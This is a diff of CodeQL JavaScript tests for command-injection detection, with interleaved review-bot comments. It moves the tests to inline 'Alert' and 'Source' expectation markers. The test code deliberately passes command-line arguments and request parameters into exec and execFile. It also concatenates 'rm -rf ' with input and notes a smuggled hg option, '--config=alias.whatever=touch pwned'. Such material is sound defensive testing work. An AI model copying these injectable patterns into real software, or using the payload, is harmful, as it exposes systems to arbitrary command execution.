a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref index 2911d45d2dac..4367c17e03ee 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref @@ -1 +1,2 @@ -Security/CWE-078/IndirectCommandInjection.ql \ No newline at end of file +query: Security/CWE-078/IndirectCommandInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js index 7a8f6982f178..021715395217 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js @@ -1,14 +1,14 @@ import { exec } from "@actions/exec"; import { getInput } from "@actions/core"; -exec(process.env['TEST_DATA']); // NOT OK -exec(process.env['GITHUB_ACTION']); // OK +exec(process.env['TEST_DATA']); // $ Alert +exec(process.env['GITHUB_ACTION']); function test(e) { - exec(e['TEST_DATA']); // NOT OK - exec(e['GITHUB_ACTION']); // OK + exec(e['TEST_DATA']); // $ Alert + exec(e['GITHUB_ACTION']); } -test(process.env); +test(process.env); // $ Source -exec(getInput('data')); // NOT OK +exec(getInput('data')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js index 17b8b6c9c25e..fe5142a0b3c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js 
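Review bot: In actions.js the two negative cases, `exec(process.env['GITHUB_ACTION']);` and `exec(e['GITHUB_ACTION']);`, lose their `// OK` marker and now carry no hint that the missing alert is intentional. With the inline-expectations postprocess an unannotated line should already assert "no alert", so the marker is not needed for the test itself, but the reason is worth keeping for readers; `cp.exec("cmd.sh " + require("minimist")().foo); // OK - no args provided.` in command-line-parameter-command-injection.js keeps one. I would add a short comment to both lines, for example `// OK - GITHUB_ACTION is presumably a runner-provided variable, not user input`, with the wording confirmed against the query's source model. The `process.argv[0]` and `process.argv[1]` lines in the next file's hunk, which continues outside this view, drop their `// OK` the same way.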
@@ -1,95 +1,95 @@ var cp = require("child_process"); (function() { - cp.exec(process.argv); // NOT OK (just weird) - cp.exec(process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[1]); // OK - cp.exec("cmd.sh " + process.argv[2]); // NOT OK + cp.exec(process.argv); // $ Alert - just weird + cp.exec(process.argv[0]); + cp.exec("cmd.sh " + process.argv[0]); + cp.exec("cmd.sh " + process.argv[1]); + cp.exec("cmd.sh " + process.argv[2]); // $ Alert - var args = process.argv.slice(2); - cp.execSync(args[0]); // NOT OK - cp.execSync("cmd.sh " + args[0]); // NOT OK + var args = process.argv.slice(2); // $ Source + cp.execSync(args[0]); // $ Alert + cp.execSync("cmd.sh " + args[0]); // $ Alert var fewerArgs = args.slice(1); - cp.execSync(fewerArgs[0]); // NOT OK - cp.execSync("cmd.sh " + fewerArgs[0]); // NOT OK + cp.execSync(fewerArgs[0]); // $ Alert + cp.execSync("cmd.sh " + fewerArgs[0]); // $ Alert var arg0 = fewerArgs[0]; - cp.execSync(arg0); // NOT OK - cp.execSync("cmd.sh " + arg0); // NOT OK + cp.execSync(arg0); // $ Alert + cp.execSync("cmd.sh " + arg0); // $ Alert }); (function() { - const args = process.argv.slice(2); + const args = process.argv.slice(2); // $ Source const script = path.join(packageDir, 'app', 'index.js'); - cp.execSync(`node ${script} ${args[0]} --option"`); // NOT OK - cp.execSync(`node ${script} ${args.join(' ')} --option"`); // NOT OK + cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert + cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert }); -cp.exec("cmd.sh " + require("get-them-args")().foo); // NOT OK +cp.exec("cmd.sh " + require("get-them-args")().foo); // $ Alert cp.exec("cmd.sh " + require("minimist")().foo); // OK - no args provided. 
-cp.exec("cmd.sh " + require("yargs").argv.foo); // NOT OK -cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK +cp.exec("cmd.sh " + require("yargs").argv.foo); // $ Alert +cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { var args = require('yargs') // eslint-disable-line .command('serve [port]', 'start the server', (yargs) => { }) .option('verbose', { foo: "bar" }) - .argv + .argv // $ Source - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert - cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // NOT OK + cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // $ Alert }); (function () { const { argv: { ...args - }, + }, // $ Source } = require('yargs') .usage('Usage: foo bar') .command(); - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert - var tainted1 = require('yargs').argv; - var tainted2 = require('yargs').parse() + var tainted1 = require('yargs').argv; // $ Source + var tainted2 = require('yargs').parse() // $ Source const {taint1: {...taint1rest},taint2: {...taint2rest}} = { taint1: tainted1, taint2: tainted2 } - cp.exec("cmd.sh " + taint1rest); // NOT OK - has flow from tainted1 - cp.exec("cmd.sh " + taint2rest); // NOT OK - has flow from tianted2 + cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1 + cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2 - var {...taint3} = require('yargs').argv; - cp.exec("cmd.sh " + taint3); // NOT OK + var {...taint3} = require('yargs').argv; // $ Source + cp.exec("cmd.sh " + taint3); // $ Alert - var [...taint4] = require('yargs').argv; - cp.exec("cmd.sh " + taint4); // NOT OK + var [...taint4] = require('yargs').argv; // $ Source + cp.exec("cmd.sh " + taint4); // $ Alert }); (function () { - const argv = process.argv.slice(2); + const argv = process.argv.slice(2); // $ Source var minimist = require("minimist"); - cp.exec("cmd.sh " + minimist(argv).foo); // NOT OK + 
cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert var subarg = require('subarg'); - cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // $ Alert var yargsParser = require('yargs-parser'); - cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert import args from 'args' - var flags = args.parse(process.argv); - cp.exec("cmd.sh " + flags.foo); // NOT OK + var flags = args.parse(process.argv); // $ Source + cp.exec("cmd.sh " + flags.foo); // $ Alert - var flags = require('arg')({...spec}); - cp.exec("cmd.sh " + flags.foo); // NOT OK + var flags = require('arg')({...spec}); // $ Source + cp.exec("cmd.sh " + flags.foo); // $ Alert }) (function () { 
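Review bot: The rewritten comment on the `taint2rest` sink keeps the typo `has flow from tianted2`. Since the line is being rewritten anyway, it could read `cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tainted2`, matching the `tainted2` variable declared a few lines above. The text after the `-` is presumably free-form for the expectation parser, so this should not change any test result.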
@@ -99,42 +99,42 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK parser.add_argument('-f', '--foo', { help: 'foo bar' }); - cp.exec("cmd.sh " + parser.parse_args().foo); // NOT OK + cp.exec("cmd.sh " + parser.parse_args().foo); // $ Alert }); (function () { const commandLineArgs = require('command-line-args'); - const options = commandLineArgs(optionDefinitions); - cp.exec("cmd.sh " + options.foo); // NOT OK + const options = commandLineArgs(optionDefinitions); // $ Source + cp.exec("cmd.sh " + options.foo); // $ Alert }); (function () { const meow = require('meow'); - const cli = meow(`helpstring`, {flags: {...flags}}); + const cli = meow(`helpstring`, {flags: {...flags}}); // $ Source - cp.exec("cmd.sh " + cli.input[0]); // NOT OK + cp.exec("cmd.sh " + cli.input[0]); // $ Alert }); (function () { var dashdash = require('dashdash'); - var opts = dashdash.parse({options: options}); + var opts = dashdash.parse({options: options}); // $ Source - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert var parser = dashdash.createParser({options: options}); - var opts = parser.parse(); + var opts = parser.parse(); // $ Source - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert }); (function () { - const { program } = require('commander'); + const { program } = require('commander'); // $ Source program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert }); (function () { 
@@ -142,8 +142,8 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK const program = new Command(); program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert - cp.execFile(program.opts().pizzaType, ["foo", "bar"]); // OK + cp.execFile(program.opts().pizzaType, ["foo", "bar"]); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected index e449f163d463..e4396669dc85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected 
@@ -1,3 +1,21 @@ +#select +| second-order.js:7:33:7:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:7:33:7:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:9:29:9:34 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:9:29:9:34 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:11:33:11:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:11:33:11:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:15:19:15:24 | myArgs | second-order.js:13:18:13:31 | req.query.args | second-order.js:15:19:15:24 | myArgs | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:13:18:13:31 | req.query.args | a user-provided value | +| second-order.js:26:35:26:40 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:26:35:26:40 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. 
| second-order.js:29:19:29:32 | req.query.args | a user-provided value | +| second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:40:28:40:43 | req.query.remote | a user-provided value | +| second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:42:31:42:46 | req.query.remote | a user-provided value | +| second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:44:18:44:31 | req.query.args | a user-provided value | +edges +| second-order.js:6:9:6:33 | remote | second-order.js:7:33:7:38 | remote | provenance | | +| second-order.js:6:9:6:33 | remote | second-order.js:9:29:9:34 | remote | provenance | | +| second-order.js:6:9:6:33 | remote | second-order.js:11:33:11:38 | remote | provenance | | +| second-order.js:6:9:6:33 | remote | second-order.js:26:35:26:40 | remote | provenance | | +| second-order.js:6:18:6:33 | req.query.remote | second-order.js:6:9:6:33 | remote | provenance | | +| second-order.js:13:9:13:31 | myArgs | second-order.js:15:19:15:24 | myArgs | provenance | | +| second-order.js:13:18:13:31 | req.query.args | second-order.js:13:9:13:31 | myArgs | provenance | | nodes | second-order.js:6:9:6:33 | remote | semmle.label | remote | | second-order.js:6:18:6:33 | req.query.remote | semmle.label | req.query.remote | 
@@ -12,22 +30,4 @@ nodes | second-order.js:40:28:40:43 | req.query.remote | semmle.label | req.query.remote | | second-order.js:42:31:42:46 | req.query.remote | semmle.label | req.query.remote | | second-order.js:44:18:44:31 | req.query.args | semmle.label | req.query.args | -edges -| second-order.js:6:9:6:33 | remote | second-order.js:7:33:7:38 | remote | provenance | | -| second-order.js:6:9:6:33 | remote | second-order.js:9:29:9:34 | remote | provenance | | -| second-order.js:6:9:6:33 | remote | second-order.js:11:33:11:38 | remote | provenance | | -| second-order.js:6:9:6:33 | remote | second-order.js:26:35:26:40 | remote | provenance | | -| second-order.js:6:18:6:33 | req.query.remote | second-order.js:6:9:6:33 | remote | provenance | | -| second-order.js:13:9:13:31 | myArgs | second-order.js:15:19:15:24 | myArgs | provenance | | -| second-order.js:13:18:13:31 | req.query.args | second-order.js:13:9:13:31 | myArgs | provenance | | subpaths -#select -| second-order.js:7:33:7:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:7:33:7:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:9:29:9:34 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:9:29:9:34 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:11:33:11:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:11:33:11:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. 
| second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:15:19:15:24 | myArgs | second-order.js:13:18:13:31 | req.query.args | second-order.js:15:19:15:24 | myArgs | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:13:18:13:31 | req.query.args | a user-provided value | -| second-order.js:26:35:26:40 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:26:35:26:40 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:29:19:29:32 | req.query.args | a user-provided value | -| second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:40:28:40:43 | req.query.remote | a user-provided value | -| second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:42:31:42:46 | req.query.remote | a user-provided value | -| second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. 
| second-order.js:44:18:44:31 | req.query.args | a user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref index 00961f212e74..b6f6625a0e76 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref @@ -1 +1,2 @@ -Security/CWE-078/SecondOrderCommandInjection.ql \ No newline at end of file +query: Security/CWE-078/SecondOrderCommandInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js index f68093d24053..b49d6b2bd73b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js 
@@ -3,19 +3,19 @@ const app = express(); const { execFile } = require("child_process"); app.get("/", (req, res) => { - const remote = req.query.remote; - execFile("git", ["ls-remote", remote]); // NOT OK + const remote = req.query.remote; // $ Source + execFile("git", ["ls-remote", remote]); // $ Alert - execFile("git", ["fetch", remote]); // NOT OK + execFile("git", ["fetch", remote]); // $ Alert - indirect("git", ["ls-remote", remote]); // NOT OK + indirect("git", ["ls-remote", remote]); // $ Alert - const myArgs = req.query.args; + const myArgs = req.query.args; // $ Source - execFile("git", myArgs); // NOT OK + execFile("git", myArgs); // $ Alert if (remote.startsWith("--")) { - execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. + execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. } else { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's not an option } @@ -23,10 +23,10 @@ app.get("/", (req, res) => { if (remote.startsWith("git@")) { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's a git URL } else { - execFile("git", ["ls-remote", remote, "HEAD"]); // NOT OK - unknown starting string + execFile("git", ["ls-remote", remote, "HEAD"]); // $ Alert - unknown starting string } - execFile("git", req.query.args); // NOT OK - unknown args + execFile("git", req.query.args); // $ Alert - unknown args execFile("git", ["add", req.query.args]); // OK - git add is not a command that can be used to execute arbitrary code 
@@ -34,16 +34,16 @@ app.get("/", (req, res) => { execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs)); // NOT OK - but not found [INCONSISTENCY]. It's hard to track through concat. - execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // OK + execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // hg - execFile("hg", ["clone", req.query.remote]); // NOT OK + execFile("hg", ["clone", req.query.remote]); // $ Alert - execFile("hg", ["whatever", req.query.remote]); // NOT OK - `--config=alias.whatever=touch pwned` + execFile("hg", ["whatever", req.query.remote]); // $ Alert - `--config=alias.whatever=touch pwned` - execFile("hg", req.query.args); // NOT OK - unknown args + execFile("hg", req.query.args); // $ Alert - unknown args - execFile("hg", ["clone", "--", req.query.remote]); // OK + execFile("hg", ["clone", "--", req.query.remote]); }); function indirect(cmd, args) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref index ee13f263562a..b9f570b25eee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref @@ -1 +1,2 @@ -Security/CWE-078/ShellCommandInjectionFromEnvironment.ql \ No newline at end of file +query: Security/CWE-078/ShellCommandInjectionFromEnvironment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
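Review bot: The known false negative on `execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs))` is still recorded only as free text (`// NOT OK - but not found [INCONSISTENCY]`). As far as I can tell, the inline-expectations postprocess wired in by this commit does not check that comment. Writing it as `// $ MISSING: Alert - hard to track through concat` would make the test fail as soon as flow through `concat` is reported, so the gap stays visible instead of silently disappearing. The enclosing `app.get` handler starts outside this hunk.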
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js index 0d610b1e9dd3..0a0edcbd25c7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js @@ -2,12 +2,12 @@ var cp = require('child_process'), path = require('path'), execa = require("execa"); (function() { - cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); // GOOD - cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // BAD + cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); + cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert - execa.shell('rm -rf ' + path.join(__dirname, "temp")); // NOT OK - execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // NOT OK + execa.shell('rm -rf ' + path.join(__dirname, "temp")); // $ Alert + execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert const safe = "\"" + path.join(__dirname, "temp") + "\""; - execa.shellSync('rm -rf ' + safe); // OK + execa.shellSync('rm -rf ' + safe); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected index 482c3cfff1b4..c4b16b01a38f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected 
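Review bot: With `// OK` dropped from `execa.shellSync('rm -rf ' + safe)`, the only remaining rationale for the negative expectation is the variable name `safe`. Wrapping the path in double quotes is not a complete shell escape: `$`, backticks, `\` and an embedded `"` in `__dirname` are still interpreted. If the query deliberately accepts quoted paths, the line should say so, e.g. `// no alert expected: quoted path is accepted by the query, though double quotes do not neutralise $ or backticks`. The `execFileSync` line above similarly lost `// GOOD`, which marked the argument-array form as the safe variant; a short plain comment there would keep that intent.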
@@ -1,8 +1,115 @@ +#select +| lib/isImported.js:6:10:6:25 | "rm -rf " + name | lib/isImported.js:5:49:5:52 | name | lib/isImported.js:6:22:6:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/isImported.js:5:49:5:52 | name | library input | lib/isImported.js:6:2:6:26 | cp.exec ... + name) | shell command | +| lib/lib2.js:4:10:4:25 | "rm -rf " + name | lib/lib2.js:3:28:3:31 | name | lib/lib2.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:3:28:3:31 | name | library input | lib/lib2.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/lib2.js:8:10:8:25 | "rm -rf " + name | lib/lib2.js:7:32:7:35 | name | lib/lib2.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:7:32:7:35 | name | library input | lib/lib2.js:8:2:8:26 | cp.exec ... + name) | shell command | +| lib/lib.js:4:10:4:25 | "rm -rf " + name | lib/lib.js:3:33:3:36 | name | lib/lib.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:3:33:3:36 | name | library input | lib/lib.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/lib.js:11:10:11:25 | "rm -rf " + name | lib/lib.js:10:32:10:35 | name | lib/lib.js:11:22:11:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:10:32:10:35 | name | library input | lib/lib.js:11:2:11:26 | cp.exec ... + name) | shell command | +| lib/lib.js:15:10:15:25 | "rm -rf " + name | lib/lib.js:14:36:14:39 | name | lib/lib.js:15:22:15:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:14:36:14:39 | name | library input | lib/lib.js:15:2:15:26 | cp.exec ... + name) | shell command | +| lib/lib.js:20:10:20:25 | "rm -rf " + name | lib/lib.js:19:34:19:37 | name | lib/lib.js:20:22:20:25 | name | This string concatenation which depends on $@ is later used in a $@. 
| lib/lib.js:19:34:19:37 | name | library input | lib/lib.js:20:2:20:26 | cp.exec ... + name) | shell command | +| lib/lib.js:27:10:27:25 | "rm -rf " + name | lib/lib.js:26:35:26:38 | name | lib/lib.js:27:22:27:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:26:35:26:38 | name | library input | lib/lib.js:27:2:27:26 | cp.exec ... + name) | shell command | +| lib/lib.js:35:11:35:26 | "rm -rf " + name | lib/lib.js:34:14:34:17 | name | lib/lib.js:35:23:35:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:34:14:34:17 | name | library input | lib/lib.js:35:3:35:27 | cp.exec ... + name) | shell command | +| lib/lib.js:38:11:38:26 | "rm -rf " + name | lib/lib.js:37:13:37:16 | name | lib/lib.js:38:23:38:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:37:13:37:16 | name | library input | lib/lib.js:38:3:38:27 | cp.exec ... + name) | shell command | +| lib/lib.js:41:11:41:26 | "rm -rf " + name | lib/lib.js:40:6:40:9 | name | lib/lib.js:41:23:41:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:40:6:40:9 | name | library input | lib/lib.js:41:3:41:27 | cp.exec ... + name) | shell command | +| lib/lib.js:50:35:50:50 | "rm -rf " + name | lib/lib.js:49:31:49:34 | name | lib/lib.js:50:47:50:50 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:49:31:49:34 | name | library input | lib/lib.js:50:2:50:51 | require ... + name) | shell command | +| lib/lib.js:54:13:54:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:54:25:54:28 | name | This string concatenation which depends on $@ is later used in a $@. 
| lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:55:2:55:14 | cp.exec(cmd1) | shell command | +| lib/lib.js:57:13:57:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:57:25:57:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:59:3:59:14 | cp.exec(cmd) | shell command | +| lib/lib.js:65:10:65:25 | "rm -rf " + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:65:2:65:26 | cp.exec ... + name) | shell command | +| lib/lib.js:69:10:69:47 | "for fo ... la end" | lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:69:2:69:48 | cp.exec ... a end") | shell command | +| lib/lib.js:71:10:71:31 | "cat /f ... + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:71:2:71:32 | cp.exec ... + name) | shell command | +| lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | lib/lib.js:64:41:64:44 | name | lib/lib.js:73:21:73:24 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | shell command | +| lib/lib.js:75:10:75:29 | "cat '" + name + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:75:20:75:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:75:2:75:30 | cp.exec ... + "'") | shell command | +| lib/lib.js:77:10:77:37 | "cat '/ ... 
e + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:77:28:77:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:77:2:77:38 | cp.exec ... + "'") | shell command | +| lib/lib.js:83:10:83:25 | "rm -rf " + name | lib/lib.js:82:35:82:38 | name | lib/lib.js:83:22:83:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:83:2:83:26 | cp.exec ... + name) | shell command | +| lib/lib.js:86:13:86:16 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:86:13:86:16 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) | shell command | +| lib/lib.js:89:21:89:24 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:89:21:89:24 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:89:2:89:36 | cp.exec ... n(" 